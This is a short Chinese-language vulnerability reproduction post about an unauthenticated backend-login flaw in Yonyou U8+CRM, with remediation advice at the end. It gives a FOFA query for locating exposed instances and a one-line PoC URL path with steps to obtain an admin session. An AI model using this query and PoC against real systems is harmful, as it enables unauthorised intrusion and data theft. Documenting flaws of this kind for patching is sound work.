用友U8+CRM 逻辑漏洞登录后台漏洞复现

0x01 产品简介

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

用友 U8 CRM客户关系管理系统 reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。

0x03 复现环境

FOFA:app="用友U8CRM"

用友U8+CRM 逻辑漏洞登录后台漏洞复现_第1张图片

0x04 漏洞复现

PoC

/background/reservationcomplete.php?ID=1

拼接url访问页面接口,重新访问首页即可登录 

用友U8+CRM 逻辑漏洞登录后台漏洞复现_第2张图片

用友U8+CRM 逻辑漏洞登录后台漏洞复现_第3张图片0x05 修复建议

关闭互联网暴露面删除或修改相关功能模块代码 

升级至安全版本

你可能感兴趣的:(漏洞复现,安全,web安全)